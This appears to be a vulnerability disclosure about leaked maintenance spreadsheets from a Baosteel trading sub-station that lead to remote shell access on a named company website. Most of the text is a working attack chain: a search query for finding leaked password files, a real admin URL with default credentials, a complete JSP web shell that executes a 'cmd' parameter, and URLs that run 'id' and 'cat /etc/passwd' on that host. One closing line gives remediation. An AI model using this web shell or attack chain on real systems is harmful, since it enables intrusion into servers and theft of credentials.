Getshell caused by leakage of O & M documents of a sub-station of Baosteel Trading Company
The maintenance documents of the sub-stations of Baosteel Trading Company are leaked, including intranet information, background addresses of multiple sub-stations, and usernames and passwords.
Among them, www.nesteel.cn (Shenyang Baosteel northeast Trading Company) can be getshell
Google query string: Baosteel filetype: xlsx intext: Password
It contains the background username, password, and management information of multiple Intranet hosts.
Background: http://www.nesteel.cn/cms_wz/login.jsp
Username: admin
Password: admin
After entering the background, you can use the template editing function to add jsp code
Add code
<%@ page import="java.util.*,java.io.*"%><%if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } }%>
You can use the site preview function to execute commands (with the cmd parameter) and getshell.
Because the document exposes a large amount of intranet information, it is estimated that it can cause greater damage because there is no time for testing.
Site preview url
View-source: http://www.nesteel.cn/cms_wz/DispatchAction.do? EfFormEname = ECTM40 & key = Encrypt & passPermit = true & cmd = id
view-source:http://www.nesteel.cn/cms_wz/DispatchAction.do?efFormEname=ECTM40&key=AWIAPwFqUzICY1dgB2AMbQNnAmEGYgM0UGMFNQJmUGIBEgxDXUZVd1ZHAUZfSFc2&passPermit=true&cmd=cat /etc/passwd
Solution:
Stop file sharing and change the background password to a strong password.